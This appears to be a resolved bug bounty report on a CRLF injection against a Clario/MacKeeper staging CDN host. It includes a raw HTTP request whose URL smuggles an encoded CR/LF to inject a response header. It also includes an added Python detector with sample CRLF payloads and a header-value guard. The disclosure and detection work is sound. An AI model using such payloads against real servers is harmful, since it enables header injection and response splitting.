CRLF Injection - http://stage-static-cdn.mackeeper.com/
Low
Clario
Submitted None
Team Summary
Official summary from Clario
### Summary
CRLF Injection - `http://stage-static-cdn.mackeeper.com/`

### Steps To Reproduce
1. In the rawRequest we have added `'%0D%0Avirus:%20value'`
2. In Burp Repeater copy and paste the below rawRequest
3. Notice the response with header added

```
------rawRequest----------
GET /%0D%0Avirus:%20value HTTP/1.1
Connection: keep-alive
Accept: /
Accept-Encoding: gzip,deflate
Host: stage-static-cdn.mackeeper.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0
------rawRequest----------
```
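An added example, not part of the report or of Clario's code: a detection pass that flags request targets carrying percent-encoded CR/LF, such as the `%0D%0A` in the request above, together with a guard that refuses to emit a header value containing CR or LF. It also covers double-encoded forms, which go beyond the single payload in the report. The log format, sample lines and all function names are assumptions.

```python
import re
from urllib.parse import unquote

MAX_DECODE_ROUNDS = 3  # assumption: enough to catch double/triple percent-encoding
CRLF = re.compile(r"[\r\n]")
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

# Constructed access-log lines (combined-log style); not taken from the report.
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Jan/2024:10:00:00 +0000] "GET /css/app.css HTTP/1.1" 200 512',
    '203.0.113.9 - - [01/Jan/2024:10:00:02 +0000] "GET /%0D%0Avirus:%20value HTTP/1.1" 301 0',
    '203.0.113.9 - - [01/Jan/2024:10:00:03 +0000] "GET /%250d%250aX-Test:%201 HTTP/1.1" 301 0',
    '203.0.113.4 - - [01/Jan/2024:10:00:05 +0000] "GET /img/100%25.png HTTP/1.1" 200 90',
]


def has_encoded_crlf(target: str) -> bool:
    """True if CR or LF appears after at most MAX_DECODE_ROUNDS percent-decodes."""
    current = target
    for _ in range(MAX_DECODE_ROUNDS + 1):
        if CRLF.search(current):
            return True
        decoded = unquote(current, encoding="latin-1")
        if decoded == current:  # nothing left to decode
            return False
        current = decoded
    return False


def flag_log_lines(lines):
    """Return (line_number, target) for each request whose target hides CR/LF."""
    hits = []
    for number, line in enumerate(lines, start=1):
        match = REQUEST_RE.search(line)
        if match and has_encoded_crlf(match.group("target")):
            hits.append((number, match.group("target")))
    return hits


def safe_header_value(value: str) -> str:
    """Mitigation side: reject any response header value containing CR or LF."""
    if CRLF.search(value):
        raise ValueError("CR/LF in header value")
    return value


if __name__ == "__main__":
    for number, target in flag_log_lines(SAMPLE_LOG):
        print(f"line {number}: suspicious target {target!r}")
```
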
Reported by
kphaks
Report Details
Additional information and metadata
State
Closed
Substate
Resolved
Bounty
$50.00
Submitted
Weakness
CRLF Injection